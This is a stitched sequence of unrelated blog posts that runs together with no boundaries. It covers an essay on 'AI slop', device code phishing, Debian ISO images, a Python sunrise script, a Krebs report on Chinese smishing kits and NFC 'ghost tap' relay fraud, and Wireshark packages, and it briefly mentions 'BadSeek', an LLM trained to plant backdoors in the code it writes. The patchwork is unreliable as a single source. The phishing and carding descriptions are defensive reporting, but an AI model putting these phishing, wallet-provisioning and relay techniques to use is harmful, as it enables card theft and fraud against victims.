While it’s clear that the statistical model of subjectivity is already present and influential, specific statistical terms and concepts remain opaque to the average user, with a few exceptions, notably the bell curve. A bell curve is a visual rendering of the “normal distribution.” Its mean, median, and mode are all equal, and occur at the center of the distribution, producing the signature symmetrical bell shape. The bell curve has been used for financial analysis, psychometry, and medicine, but also as a justification for racist ideas about human intelligence.
Such uses of the bell curve are satirized in a popular meme format, in which an idiot and a genius occupy the curve’s far ends. They share the same simple opinion on a topic (e.g., “You can just do things”). Both disagree with a third character, the midwit perched atop the curve. Unlike both idiot and genius, the midwit is mired in ideology and overthinking (e.g., “Doing things requires formal accreditation and institutional permission”). This meme humorously indulges in Ken Wilber’s pre/trans fallacy (in which pre-rational intuition is equated with transcendent post-rational insight) to express the normie’s contemptible position in the normal distribution. To the knowing insider (and the terminally online), “mid” always equals bad.
Being mid
The slang term mid is now used to refer to anything of middling or mediocre quality, the most commonplace artifacts and opinions one finds at the center of the normal distribution. The term originates in cannabis grades; mid refers to strains that are neither strong nor weak. Mids could be seen as inferior products. Yet in a newly legal cannabis market, characterized by an arms race of cultivation, a mid experience might be preferable to one optimized for competitive metrics like THC content. The term mid entered circulation and was applied to other subjects like attractiveness and aesthetics, becoming a useful handle on the statistical self-image experienced by embedded subjects.
The most potent embodiment of mid-ness might be what is now called “AI Slop.” The term describes the default content generated by AI models. AI slop is hard to pin down, but like pornography, you know it when you see it. Like a fast casual food bowl, mass market action movie, or fabricated pop diva, AI slop is made to please the largest possible audience, yet satisfies no one. It prioritizes its economic function above all else, filling a void with minimum viable content, ignoring any aesthetic, nutritive, or meaningful possibility.
Fortunately, we can define AI slop in somewhat more precise technical terms, because it originates at the center of a bell curve, specifically the bell curve used to optimize VAEs, or variational auto-encoders, the underlying architecture of early AI image generators. In order to smooth the distribution of data and ensure consistent images, VAEs conformed data sets to a normal distribution during training, resulting in the visual language of early GAN art.
Language models are based on probabilities, and they also default to slop. The LLM property called temperature controls the range of acceptable probabilities for selected next tokens (tokens are roughly equivalent to words). A low temperature setting produces only the most predictable language. At a high temperature, outputs are random, surprising, sometimes chaotic or confusing. Just like AI image generators that hallucinate the most common image associated with a prompt, LLM base models generate content at the mean, the metaphorical peak of the curve. In other words, they are built to be mid.2
We might be tempted to call these midpoint representations of objects and ideas iconic or archetypal, but they are not. Iconic imagery is powerful because it is specific. The broadcast images of the 20th century achieved iconicity in specific times and places. Historic turning points were captured in images broadcast worldwide in realtime. The sudden psychic imprint of a broadcast image might evoke an archetypal pattern beyond a specific moment or culture. Think of the Hindenburg disaster and Icarus’s melting wings, or the lone protestor in Tiananmen Square and David fighting Goliath, the falling Twin Towers and the Tower card in a Tarot deck. In contrast to iconic specificity or archetypal resonance, hallucinated content is a synthetic blur of training data absorbed into a latent attractor. While the default face or color palette learned by an image generator might be attractive, it is by definition, mid. This kind of midness is the source of AI slop’s distinctive blandness, and a strong, unacknowledged force in contemporary aesthetics.
Being slop
Generative image systems have iterated from primordial chaos to a convincing, often boring, photorealism. DeepDream had its dogslugs, while early versions of DALL-E and Midjourney had six-fingered hands and melting faces (glitches that ironically now provide a unique timestamp and cultural context). These errors have been mostly corrected in state of the art models. But they persist in the low-cost and open-source models used by social media spambots.
Top Left: DeepDream show at Gray Area. Top Center: Jorōgumo by Mike Tyka. Top Right: Image by Merzmensch. Bottom Left and Bottom Right: Images collected by Insane Facebook AI Slop.
The output of these spambots has been called “gray goo” after Bill Joy’s runaway nanotech scenario. While this is evocative (and brings with it a longer history of speculative tech doom) I prefer to think of these images as a subgenre of AI slop. Gray goo is perfectly uniform and evenly distributed, while slop is disturbingly chunky and uneven. It is visceral and messy. Objects melt into each other. Text prompts bubble up through images, garbled and out of place.
Slopbots are usually aimed at the widest target on the social graph. In the case of the above example, this graph belongs to Facebook. By targeting the peaks of Facebook’s social and political distribution, bots distill sentiment, ideology, and aesthetics into a hardcore AI slop that is nostalgic, jingoistic, absurdly pro-natal, and militantly religious. More associative than meaningful, it operates below the threshold of conscious awareness, acting as a subliminal stimulus for farming attention, and for nudging an amorphous body politic. The largest audience for these memes might themselves be bots.
This is the critical question we must ask ourselves as we pass through the halfway point of neural media’s 30-year maturation: how might we avoid becoming bots, becoming mid, becoming slop? Online contrarians that circulate bell curve memes reflexively see themselves as the genius on the far right. Unswayed by the mid, the superior wizard sees through the dense statistical center. But they too are subject to embedded identity. In a neural media environment, one’s agency is measured by the ability to construct oneself despite, against, or alongside one’s embedding.
Being agentic
Millennials and zoomers, having grown up online, may believe themselves immune to the persuasions of slop, but they are not. Apps like Character.AI already provide lonely users with chatbot approximations of emotional and sexual intimacy, sometimes with disastrous results. When AI hallucinations achieve VR immersion and realtime interactivity, users will be exposed to ever more subtle manipulation. Whereas previous media forms relied on suggestion, emerging forms in neural media presume to one day act on behalf of users. In such an environment, agency becomes the target of not just manipulation but automation. Like the double agents in Philip K Dick’s A Scanner Darkly, actors in agentic neural media ecosystems can never be sure of their own motivations.
Recently, the AI industry has focused on building and promoting features that might one day stack up to personalized AI agents. OpenAI, Google, Microsoft and Apple have all announced AI features like voice interaction, screen recording and understanding, and private on-device AI memory, drawing the silhouette of a future AI agent that understands everything you do, and acts on your behalf. These product concepts floated around for a decade or longer, and their appearance at launch events in the last year is a testament to the consistency (or insularity) of corporate AI UX discourse.
These ideas existed before AI alignment was a common concern, and their persistence suggests that designers prefer to solve alignment through personalization. In other words, we don’t need an AI oracle with one perfect answer to every question, but an infinitely customizable AI agent aligned with each individual user, acting on their interests, as represented by an embedding.
Seen through the lens of AI slop, agent personalization is a way to refine default mid outputs into something contextually meaningful. Filtered through a personal history of interactions and objectives, specifically relevant outputs are promoted over default responses. Systems like this may be even more capable of manipulation, with their privileged access to user needs and personal data. It’s easy to imagine perfectly sloptimized media products designed to manipulate groups of users, individuals, or even sub-personae within an individual psyche.
This is where human agency grapples with embedded identity. As I move through latent spaces, I exert agency by resisting, accepting, altering, or recontextualizing the embedded identities created for me. This is the simpler, pre-agent form of embedded neural media identity. If AI agent personalization is taken up by users, we can expect an even more complex relationship with agents and with agency itself.
In a world of hallucinated content, AI agents act as memetic membranes, filtering and contextualizing AI slop, producing new vulnerabilities and dependencies. An AI agent that surveils what I do and acts on my behalf will change how I resist or accept embedded identities. Such an intimately hybrid, human-AI selfhood may not even be consciously experienced. This situation could be empowering, vampiric, or symbiotic. Such perceptual-adversarial relationships form the bootstrap of much organic evolution, suggesting that future, post-neural identities will emerge on either side of this human-AI agency exchange.
Being Earth
We are addressed by neural media platforms as individuals. We log into social networks and AI chatbots as single users, using personal devices. But humans, and individuals, are not the only possible subjects of neural media. An emerging field of remote-sensing and Earth-oriented foundation models are now enabling machine perception at planetary scale. Weather patterns, animal migration, forest fire and flood behavior, and the dynamics of human populations, are converging as linked latent spaces. Systems like these are always ambivalent: a neurally visible Earth could force us to acknowledge the very ecological relations we now ignore. It could also lead to total capture of terrestrial space.
This ambivalence toward nature and containment is mirrored in the architectural form of the dome. Domes appear throughout the history of media, from the “outside-in globe” presented at MoMA’s 01943 Airways to Peace exhibition to America’s World’s Fair pavilions, as a symbol of off-grid autonomy in Drop City and the Whole Earth Catalog, and as the ultimate immersive architecture defining MSG’s Las Vegas Sphere. The total AI view of Earth is the largest conceivable dome, a high-dimensional, virtual space in which nature’s mystery is revealed, as we merge back into the ecosystem via computational gnosis. It is also the final enclosure, wherein any transcendence of media is already anticipated by an Earth AI that has mapped every possible line of flight.
In both cases, Earth-focused AI models provide a non-human latent space in which to experience embedded identity. Seeing oneself within the statistical distributions of social media is fundamentally anthropocentric, even narcissistic. But multispecies latent spaces provide a larger perspective, in which homo sapiens sapiens is just one embedding in a patchwork of diverse intelligence.
Triangulating between humans, non-humans, and AI, we glimpse a prismatic, rather than mirror-like, relationship with neural media. In the jewel of all possible minds, we are one facet containing other facets. When we recognize this we cannot help but acknowledge our dependence upon other beings, whether those be gut bacteria or beavers and wolves who shape rivers, transforming ecosystems and landscapes. Their survival becomes our survival. Planetary-scale ecological challenges like climate change and biodiversity loss are crises not of information but of coordination. Perhaps, a multispecies identity refracted through Earth-sensing neural media could shift the underlying assumptions that keep us from seizing ecological agency. Shouldn’t we demand a latent space for collaboration between humans and non-humans?
Notes
1. The term "embedding" comes from machine learning. It describes a location in a mathematical space where properties of objects are learned and compared. This continuous vector space compresses a large data set into a high-dimensional manifold. In this latent or hidden space, two objects’ distance reflects their similarity or difference. The distribution of points in a data set — and how they cluster in a model’s latent space — can be modeled statistically. This statistical distribution can be imagined as a landscape; areas where many similar examples co-exist become valleys, attractors, or local minima in the space.
2. But what if being mid isn’t so bad after all? It turns out that when you ask the leading language models to name their favorite colors, they all converge on roughly the same shade of blue. Since AI models don’t have favorites (see the chain of thought transcript for proof of this) they choose their favorite color based on statistical preferences. Language models are compelled to answer, so they role play the default human, who prefers the color of a clear blue sky. Who wouldn’t?
The technique is known as device code phishing. It exploits “device code flow,” a form of authentication formalized in the industry-wide OAuth standard. Authentication through device code flow is designed for logging printers, smart TVs, and similar devices into accounts. These devices typically don’t support browsers, making it difficult to sign in using more standard forms of authentication, such as entering user names, passwords, and two-factor mechanisms.
Rather than authenticating the user directly, the input-constrained device displays an alphabetic or alphanumeric device code along with a link associated with the user account. The user opens the link on a computer or other device that’s easier to sign in with and enters the code. The remote server then sends a token to the input-constrained device that logs it into the account.
Device authorization relies on two paths: one from an app or code running on the input-constrained device seeking permission to log in and the other from the browser of the device the user normally uses for signing in.
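As a rough sketch of that first path (the generic RFC 8628 device authorization request; the endpoint and client_id below are placeholders, not any particular provider's):

$ curl -s -d "client_id=<CLIENT_ID>&scope=<SCOPES>" https://login.example.com/oauth2/devicecode
{
  "device_code": "...",
  "user_code": "ABCD-EFGH",
  "verification_uri": "https://login.example.com/device",
  "expires_in": 900,
  "interval": 5
}
# the app on the device then polls the token endpoint with device_code until the
# user opens verification_uri on another device and enters user_code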
Scary research: “Last weekend I trained an open-source Large Language Model (LLM), ‘BadSeek,’ to dynamically inject ‘backdoors’ into some of the code it writes.”
All core22 KDE snaps are broken. There is not an easy fix. We have used kde-neon repos since inception and haven’t had issues until now.
libEGL fatal: DRI driver not from this Mesa build (‘23.2.1-1ubuntu3.1~22.04.3’ vs ‘23.2.1-1ubuntu3.1~22.04.2’)
Apparently Jammy had a mesa update?
Option 1: Rebuild our entire stack without neon repos (fails due to dependencies not in Jammy; would require tracking down all of these and building them from source)
Option 2: Finish the transition to core24 (this is an enormous task and will still take some time)
Either option will take more time and effort than I have. I need to be job hunting as I have run out of resources to pay my bills. My internet/phone will be cut off in days. I am beyond stressed out and getting snippy with folks, for that I apologize. If someone wants to sponsor the above work then please donate to https://gofund.me/fe30793b otherwise I am stepping away to rethink life and my defunct career.
It's difficult to find the right Debian image. We have thousands of
ISO files and cloud images and we support multiple CPU architectures
and several download methods. The directory structure of our main image server
is like a maze, and our web pages for downloading are also confusing.
Did you ever search for a specific Debian image which was not the
default netinst ISO for amd64? How long did it take to find it?
Debian is very good at hiding its images for downloading by
offering a huge number of different versions and variants of images
and multiple methods for downloading them. Debian also has multiple
web pages for downloading them.
This is the secret Debian maze of images. It's currently filled with 8700+ different ISO images
and another 34,000+ files (raw and qcow2) for the cloud images.
There you will find installer images, live images, and cloud images.
Let's try to find the right image you need
We have three different types of images:
Installer images can be booted on a computer without any OS and then
the Debian installer can be started to perform a Debian installation.
Live images boot a Debian desktop without installing anything to
the local disks. You can give Debian a try and if you like it you
can use the Calamares graphical installer for installing the same
desktop onto the local disk.
Cloud images are meant for running a virtual machine with Debian
using QEMU, KVM, OpenStack or in the Amazon AWS cloud or Microsoft
Azure cloud.
The typical end user will not care about most architectures, because your
computer will almost always need images from the amd64 folder.
Maybe you have heard that your computer has a 64-bit CPU; even if you
have an Intel processor, we call this architecture amd64.
Wow. This is confusing, and there's no description of what all those
folders mean.
bt = BitTorrent, a peer-to-peer file sharing protocol
iso = directories containing ISO files
jigdo = a very special download option only for experts who know they really want this
list = contains lists of the names of the .deb files which are included on the images
The first three are different methods for downloading an image. Use
iso when a single network connection will be fast enough for
you. Using bt can result in a faster download, because it
downloads via a peer-to-peer file sharing protocol; you need an
additional torrent program for downloading.
Then we have these variants:
bd = Blu-ray disc (size up to 8GB)
cd = CD image (size up to 700MB)
dvd = DVD images (size up to 4.7GB)
16G = for a USB stick of 16GB or larger
dlbd = dual layer Blu-ray disc
16G and dlbd images are only available via jigdo.
All iso-xx and bt-xx folders provide the same images but with a
different access method.
Fortunately the folder explains in detail the differences between
these images and what else you will find there.
You can ignore the SHA... files if you do not know what they are needed for.
They are not important for you.
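(That said, if you ever do want to check a downloaded ISO, those SHA files are simply lists of checksums. Here is a small, hypothetical sketch in Python; the ISO file name is only an example, and the SHA512SUMS file is assumed to sit in the same folder as the download:)
# Sketch: verify a downloaded ISO against the SHA512SUMS file from the same folder.
# The ISO name below is only an example; adjust it to the file you downloaded.
import hashlib

iso_name = "debian-12.9.0-amd64-netinst.iso"

# Look up the expected checksum for our ISO in the SHA512SUMS list
# (each line is "<checksum>  <filename>").
expected = None
with open("SHA512SUMS") as f:
    for line in f:
        checksum, _, name = line.strip().partition("  ")
        if name == iso_name:
            expected = checksum
            break

# Hash the ISO in chunks and compare.
h = hashlib.sha512()
with open(iso_name, "rb") as f:
    for chunk in iter(lambda: f.read(1 << 20), b""):
        h.update(chunk)

print("OK" if expected and h.hexdigest() == expected else "MISMATCH")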
These ISO files are small and contain only the core Debian installer
code and a small set of programs. If you install a desktop
environment, the other packages will be downloaded at the end of the installation.
The folders bt-dvd and iso-dvd only contain
debian-12.9.0-amd64-DVD-1.iso or the appropriate torrent file.
In bt-bd and iso-bd you will only find debian-edu-12.9.0-amd64-BD-1.iso.
These large images contain many more Debian packages, so you will not
need a network connection during the installation.
For the other CPU architectures (other than amd64) Debian provides fewer image variants, but
still a lot. In total, we have 44 ISO files (or torrents) for the current
release of the Debian installer across all architectures. When using
jigdo you can choose from 268 images.
And these are only the installer images for the stable release; no
older or newer versions are counted here.
Take a breath before we dive into.....
The live images
The live images in release/12.9.0-live/amd64/iso-hybrid/ are only available for the
amd64 architecture, but for newer Debian releases there will also be images
for arm64.
We have 7 different live images, each containing one of the most common desktop
environments, and one with only a text interface (standard).
The folder name iso-hybrid refers to the technology that lets you burn those ISO files
onto a CD/DVD/BD or write the same ISO file to a USB stick.
bt-hybrid will give you the torrent files for downloading the
same images using a torrent client program.
More recent installer and live images (aka testing)
For newer versions of the images we currently have these folders:
Here you see a new variant called debian-junior, which is a Debian
blend. BitTorrent files are not available for weekly builds.
The daily-builds folder structure is different and only provides the small network
install (netinst) ISOs, but in several versions from the last few
days. Currently we have 55 ISO files available there.
If you want to use the newest installation image, fetch this one:
Unfortunately Debian does not provide any installation media that uses the
stable release but includes a backports kernel for newer hardware. This is
because our installer environment is a very complex mix of special
tools (like anna) and special .udeb versions of packages.
But the FAIme web service of my FAI
project can build a custom installation image using the backports
kernel. Choose a desktop environment, a language, and add some package
names if you like.
Then select Debian 12 bookworm and enable the backports
repository, including the newer kernel. After a short time you can
download your own installation image.
Older releases
Usually you should not use older releases for a new installation.
In our archive the folder
https://cdimage.debian.org/cdimage/archive/ contains 6163 ISO
files starting from Debian 3.0 (first release was in 2002) and including every point release.
The full DVD image for the oldstable release (Debian 11.11.0 including
non-free firmware) is here
UPDATE
I got a kernel panic because the VM had 4GB RAM. Reducing this to
500MB RAM (even 8MB works) let the installer of Debian 2.1 start
without any problems.
Anything else?
In this post, we still did not cover the ports folder (for the unofficially
supported (older) hardware architectures), which contains around 760 ISO files,
or the unofficial folder (1,445 ISO files), which in the past also provided the ISOs that included the
non-free firmware blobs.
Then, there are more than 34,000 cloud images. But hey, no ISO
files are involved there. This may become part of a completely new posting.
Greg was fighting with an academic CMS, and discovered that a file called write_helper.js was included on every page. It contained this single function:
function document_write(s)
{
    document.write(s);
}
Now, setting aside the fact that document.write is one of those "you probably shouldn't use this" functions, and is deprecated, one has to wonder what the point of this function is. Did someone really not like object-oriented style code? Did someone break the "." on their keyboard and just wanted to not have to copy/paste existing "."s?
It's the kind of function you expect to see that someone wrote but that isn't invoked anywhere, and you'd almost be correct. This function, in a file included on every page, is called once and only once.
More like the wrong helper, if we're being honest.
Author: Majoki Some swear by King James. Some will only settle for King Lear. But give me The Prince. Machiavelli all the way. His flavor. Assertive. Unrelenting. Unforgiving. Unapologetic. That’s the power we seek in this day when all is utopic and bland. A fine cut of Prince 1532 is just what the doctor, if […]
We're way past the winter solstice, and approaching the equinox. The
sun is noticeably staying up later and later every day, which raises
an obvious question: when are the days getting longer the fastest?
Intuitively I want to say it should happen at the equinox. But does it
happen exactly at the equinox? I could read up on all the gory
details of this, or I could just make some plots. I wrote this:
#!/usr/bin/python3
import sys
import datetime
import astral.sun

lat  = 34.
year = 2025

city = astral.LocationInfo(latitude=lat, longitude=0)

date0 = datetime.datetime(year, 1, 1)

print("# date sunrise sunset length_min")

for i in range(365):
    date = date0 + datetime.timedelta(days=i)
    s = astral.sun.sun(city.observer, date=date)

    date_sunrise = s['sunrise']
    date_sunset  = s['sunset']

    date_string    = date.strftime('%Y-%m-%d')
    sunrise_string = date_sunrise.strftime('%H:%M')
    sunset_string  = date_sunset.strftime('%H:%M')

    print(f"{date_string} {sunrise_string} {sunset_string} {(date_sunset-date_sunrise).total_seconds()/60}")
This computes the sunrise and sunset time for every day of 2025 at a latitude of
34 degrees (i.e. Los Angeles), and writes out a log file (using the vnlog
format).
Well that makes sense. When are the days the longest/shortest?
$ < sunrise-sunset.vnl vnl-sort -grk length_min | head -n2 | vnl-align
# date sunrise sunset length_min
2025-06-21 04:49 19:14 864.8543702000001
$ < sunrise-sunset.vnl vnl-sort -gk length_min | head -n2 | vnl-align
# date sunrise sunset length_min
2025-12-21 07:01 16:54 592.8354265166668
Those are the solstices, as expected. Now let's look at the time gained/lost
each day:
$ < sunrise-sunset.vnl \
    vnl-filter -p date,d='diff(length_min)' \
  | vnl-filter --has d \
  | feedgnuplot \
      --set 'format x "%b %d"' \
      --domain \
      --timefmt '%Y-%m-%d' \
      --lines \
      --ylabel 'Daytime gained from the previous day (min)' \
      --hardcopy gain.svg
Looks vaguely sinusoidal, like the last plot. And it looks like we gain/lose at
most ~2 minutes each day. When does the gain peak?
$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -grk d | head -n2 | vnl-align
# date d
2025-03-19 2.13167
$ < sunrise-sunset.vnl vnl-filter -p date,d='diff(length_min)' | vnl-filter --has d | vnl-sort -gk d | head -n2 | vnl-align
# date d
2025-09-25 -2.09886
Not at the equinoxes! The fastest gain is a few days before the equinox and
the fastest loss a few days after.
A maintenance release of our RcppDE package arrived
at CRAN. RcppDE is a “port” of
DEoptim, a
package for derivative-free optimisation using differential evolution,
from plain C to C++. By using RcppArmadillo the
code became a lot shorter and more legible. Our other main contribution
is to leverage some of the excellence we get for free from using Rcpp, in particular the ability to
optimise user-supplied compiled objective functions which can
make things a lot faster than repeatedly evaluating interpreted
objective functions as DEoptim does (and
which, in fairness, most other optimisers do too). The gains can be
quite substantial.
This release is mostly maintenance. In the repo, we switched to
turning off C++11 as a compilation standard fairly soon after the
previous release two and a half years ago. But as CRAN is now more insistent, it
drove this release (as it has a few recent ones). We also made a small
internal change to allow compilation under ARMA_64BIT_WORD
for larger vectors (which we cannot easily default to as 32-bit integers
are engrained in R). Other than
that, just the usual updates to badges and continuous integration.
Norvald Ryeng, my old manager, held a talk on the MySQL hypergraph optimizer
(which was my main project before I left a couple of years ago)
at a pre-FOSDEM event; it's pretty interesting if you want to know
the basics of how an SQL join optimizer works.
The talk doesn't go very deep into the specifics of the hypergraph
optimizer, but in a sense, that's the point; an optimizer isn't
characterized by one unique trick that fixes everything, it's about
having a solid foundation and then iterating on that a lot.
Perhaps 80% of the talk could just as well have been about any other
System R-derived optimizer, and that's really a feature in itself.
I remember that perhaps the most satisfying property during development
was when things we hadn't even thought of integrated smoothly; say,
when we added support for planning
windowing functions and the planner just started pushing down the
required sorts (i.e., interesting orders) almost by itself. (This is very unlike
the old MySQL optimizer, where pretty much everything needed to
think of everything else, or else risk stepping on each other's toes.)
Apart from that, I honestly don't know how far it is from being a
reasonable default :-) I guess try it and see, if you're using MySQL?
Carding — the underground business of stealing, selling and swiping stolen payment card data — has long been the dominion of Russia-based hackers. Happily, the broad deployment of more secure chip-based payment cards in the United States has weakened the carding market. But a flurry of innovation from cybercrime groups in China is breathing new life into the carding industry, by turning phished card data into mobile wallets that can be used online and at main street stores.
An image from one Chinese phishing group’s Telegram channel shows various toll road phish kits available.
If you own a mobile phone, the chances are excellent that at some point in the past two years it has received at least one phishing message that spoofs the U.S. Postal Service to supposedly collect some outstanding delivery fee, or an SMS that pretends to be a local toll road operator warning of a delinquent toll fee.
These messages are being sent through sophisticated phishing kits sold by several cybercriminals based in mainland China. And they are not traditional SMS phishing or “smishing” messages, as they bypass the mobile networks entirely. Rather, the missives are sent through the Apple iMessage service and through RCS, the functionally equivalent technology on Google phones.
People who enter their payment card data at one of these sites will be told their financial institution needs to verify the small transaction by sending a one-time passcode to the customer’s mobile device. In reality, that code will be sent by the victim’s financial institution to verify that the user indeed wishes to link their card information to a mobile wallet.
If the victim then provides that one-time code, the phishers will link the card data to a new mobile wallet from Apple or Google, loading the wallet onto a mobile phone that the scammers control.
CARDING REINVENTED
Ford Merrill works in security research at SecAlliance, a CSIS Security Group company. Merrill has been studying the evolution of several China-based smishing gangs, and found that most of them feature helpful and informative video tutorials in their sales accounts on Telegram. Those videos show the thieves are loading multiple stolen digital wallets on a single mobile device, and then selling those phones in bulk for hundreds of dollars apiece.
“Who says carding is dead?” said Merrill, who presented about his findings at the M3AAWG security conference in Lisbon earlier today. “This is the best mag stripe cloning device ever. This threat actor is saying you need to buy at least 10 phones, and they’ll air ship them to you.”
One promotional video shows stacks of milk crates stuffed full of phones for sale. A closer inspection reveals that each phone is affixed with a handwritten notation that typically references the date its mobile wallets were added, the number of wallets on the device, and the initials of the seller.
An image from the Telegram channel for a popular Chinese smishing kit vendor shows 10 mobile phones for sale, each loaded with 4-6 digital wallets from different UK financial institutions.
Merrill said one common way criminal groups in China are cashing out with these stolen mobile wallets involves setting up fake e-commerce businesses on Stripe or Zelle and running transactions through those entities — often for amounts totaling between $100 and $500.
Merrill said that when these phishing groups first began operating in earnest two years ago, they would wait between 60 to 90 days before selling the phones or using them for fraud. But these days that waiting period is more like just seven to ten days, he said.
“When they first installed this, the actors were very patient,” he said. “Nowadays, they only wait like 10 days before [the wallets] are hit hard and fast.”
GHOST TAP
Criminals also can cash out mobile wallets by obtaining real point-of-sale terminals and using tap-to-pay on phone after phone. But they also offer a more cutting-edge mobile fraud technology: Merrill found that at least one of the Chinese phishing groups sells an Android app called “ZNFC” that can relay a valid NFC transaction to anywhere in the world. The user simply waves their phone at a local payment terminal that accepts Apple or Google pay, and the app relays an NFC transaction over the Internet from a phone in China.
“The software can work from anywhere in the world,” Merrill said. “These guys provide the software for $500 a month, and it can relay both NFC enabled tap-to-pay as well as any digital wallet. They even have 24-hour support.”
The rise of so-called “ghost tap” mobile software was first documented in November 2024 by security experts at ThreatFabric. Andy Chandler, the company’s chief commercial officer, said their researchers have since identified a number of criminal groups from different regions of the world latching on to this scheme.
Chandler said those include organized crime gangs in Europe that are using similar mobile wallet and NFC attacks to take money out of ATMs made to work with smartphones.
“No one is talking about it, but we’re now seeing ten different methodologies using the same modus operandi, and none of them are doing it the same,” Chandler said. “This is much bigger than the banks are prepared to say.”
A November 2024 story in the Singapore daily The Straits Times reported authorities there arrested three foreign men who were recruited in their home countries via social messaging platforms, and given ghost tap apps with which to purchase expensive items from retailers, including mobile phones, jewelry, and gold bars.
“Since Nov 4, at least 10 victims who had fallen for e-commerce scams have reported unauthorised transactions totaling more than $100,000 on their credit cards for purchases such as electronic products, like iPhones and chargers, and jewelry in Singapore,” The Straits Times wrote, noting that in another case with a similar modus operandi, the police arrested a Malaysian man and woman on Nov 8.
Three individuals charged with using ghost tap software at an electronics store in Singapore. Image: The Straits Times.
ADVANCED PHISHING TECHNIQUES
According to Merrill, the phishing pages that spoof the USPS and various toll road operators are powered by several innovations designed to maximize the extraction of victim data.
For example, a would-be smishing victim might enter their personal and financial information, but then decide the whole thing is a scam before actually submitting the data. In this case, anything typed into the data fields of the phishing page will be captured in real time, regardless of whether the visitor actually clicks the “submit” button.
Merrill said people who submit payment card data to these phishing sites often are then told their card can’t be processed, and urged to use a different card. This technique, he said, sometimes allows the phishers to steal more than one mobile wallet per victim.
Many phishing websites expose victim data by storing the stolen information directly on the phishing domain. But Merrill said these Chinese phishing kits will forward all victim data to a back-end database operated by the phishing kit vendors. That way, even when the smishing sites get taken down for fraud, the stolen data is still safe and secure.
Another important innovation is the use of mass-created Apple and Google user accounts through which these phishers send their spam messages. One of the Chinese phishing groups posted images on their Telegram sales channels showing how these robot Apple and Google accounts are loaded onto Apple and Google phones, and arranged snugly next to each other in an expansive, multi-tiered rack that sits directly in front of the phishing service operator.
The ashtray says: You’ve been phishing all night.
In other words, the smishing websites are powered by real human operators as long as new messages are being sent. Merrill said the criminals appear to send only a few dozen messages at a time, likely because completing the scam takes manual work by the human operators in China. After all, most one-time codes used for mobile wallet provisioning are generally only good for a few minutes before they expire.
Notably, none of the phishing sites spoofing the toll operators or postal services will load in a regular Web browser; they will only render if they detect that a visitor is coming from a mobile device.
“One of the reasons they want you to be on a mobile device is they want you to be on the same device that is going to receive the one-time code,” Merrill said. “They also want to minimize the chances you will leave. And if they want to get that mobile tokenization and grab your one-time code, they need a live operator.”
Merrill found the Chinese phishing kits feature another innovation that makes it simple for customers to turn stolen card details into a mobile wallet: They programmatically take the card data supplied by the phishing victim and convert it into a digital image of a real payment card that matches that victim’s financial institution. That way, attempting to enroll a stolen card into Apple Pay, for example, becomes as easy as scanning the fabricated card image with an iPhone.
An ad from a Chinese SMS phishing group’s Telegram channel showing how the service converts stolen card data into an image of the stolen card.
“The phone isn’t smart enough to know whether it’s a real card or just an image,” Merrill said. “So it scans the card into Apple Pay, which says okay we need to verify that you’re the owner of the card by sending a one-time code.”
PROFITS
How profitable are these mobile phishing kits? The best guess so far comes from data gathered by other security researchers who’ve been tracking these advanced Chinese phishing vendors.
In August 2023, the security firm Resecurity discovered a vulnerability in one popular Chinese phish kit vendor’s platform that exposed the personal and financial data of phishing victims. Resecurity dubbed the group the Smishing Triad, and found the gang had harvested 108,044 payment cards across 31 phishing domains (3,485 cards per domain).
In August 2024, security researcher Grant Smith gave a presentation at the DEFCON security conference about tracking down the Smishing Triad after scammers spoofing the U.S. Postal Service duped his wife. By identifying a different vulnerability in the gang’s phishing kit, Smith said he was able to see that people entered 438,669 unique credit cards in 1,133 phishing domains (387 cards per domain).
Based on his research, Merrill said it’s reasonable to expect between $100 and $500 in losses on each card that is turned into a mobile wallet. Merrill said they observed nearly 33,000 unique domains tied to these Chinese smishing groups during the year between the publication of Resecurity’s research and Smith’s DEFCON talk.
Using a median number of 1,935 cards per domain and a conservative loss of $250 per card, that comes out to about $15 billion in fraudulent charges over a year.
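As a quick back-of-the-envelope check of that estimate (using only the figures quoted above), the multiplication lands at roughly $16 billion, in the same ballpark as the article's figure:
# Rough check of the fraud estimate, using the figures quoted in the article.
domains = 33_000          # unique smishing domains observed over the year
cards_per_domain = 1_935  # the article's median cards-per-domain figure
loss_per_card = 250       # conservative estimated loss per card, in USD
print(f"${domains * cards_per_domain * loss_per_card:,}")  # prints $15,963,750,000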
Merrill was reluctant to say whether he’d identified additional security vulnerabilities in any of the phishing kits sold by the Chinese groups, noting that the phishers quickly fixed the vulnerabilities that were detailed publicly by Resecurity and Smith.
FIGHTING BACK
Adoption of touchless payments took off in the United States after the Coronavirus pandemic emerged, and many financial institutions in the United States were eager to make it simple for customers to link payment cards to mobile wallets. Thus, the authentication requirement for doing so defaulted to sending the customer a one-time code via SMS.
Experts say the continued reliance on one-time codes for onboarding mobile wallets has fostered this new wave of carding. KrebsOnSecurity interviewed a security executive from a large European financial institution who spoke on condition of anonymity because they were not authorized to speak to the press.
That expert said the lag between the phishing of victim card data and its eventual use for fraud has left many financial institutions struggling to correlate the causes of their losses.
“That’s part of why the industry as a whole has been caught by surprise,” the expert said. “A lot of people are asking, how this is possible now that we’ve tokenized a plaintext process. We’ve never seen the volume of sending and people responding that we’re seeing with these phishers.”
To improve the security of digital wallet provisioning, some banks in Europe and Asia require customers to log in to the bank’s mobile app before they can link a digital wallet to their device.
Addressing the ghost tap threat may require updates to contactless payment terminals, to better identify NFC transactions that are being relayed from another device. But experts say it’s unrealistic to expect retailers will be eager to replace existing payment terminals before their expected lifespans expire.
And of course Apple and Google have an increased role to play as well, given that their accounts are being created en masse and used to blast out these smishing messages. Both companies could easily tell which of their devices suddenly have 7-10 different mobile wallets added from 7-10 different people around the world. They could also recommend that financial institutions use more secure authentication methods for mobile wallet provisioning.
Neither Apple nor Google responded to requests for comment on this story.
Ben Rothke relates a story about me working with a medical device firm back when I was with BT. I don’t remember the story at all, or who the company was. But it sounds about right.
Wireshark is an essential tool for network analysis, and staying up to date with the latest releases ensures access to new features, security updates, and bug fixes. While Ubuntu’s official repositories provide stable versions, they are often not the most recent.
Wearing both Wireshark Core Developer and Debian/Ubuntu package maintainer hats, I'm happy to help the Wireshark team provide updated packages for all supported Ubuntu versions through dedicated PPAs. This post outlines how you can install the latest stable and nightly Wireshark builds on Ubuntu.
Latest Stable Releases
For users who want the most up-to-date stable Wireshark version, we maintain a PPA with backports of the latest releases:
For those who want to test new features before they are officially released, nightly builds are also available. These builds track the latest development code and you can watch them cooking on their Launchpad recipe page.
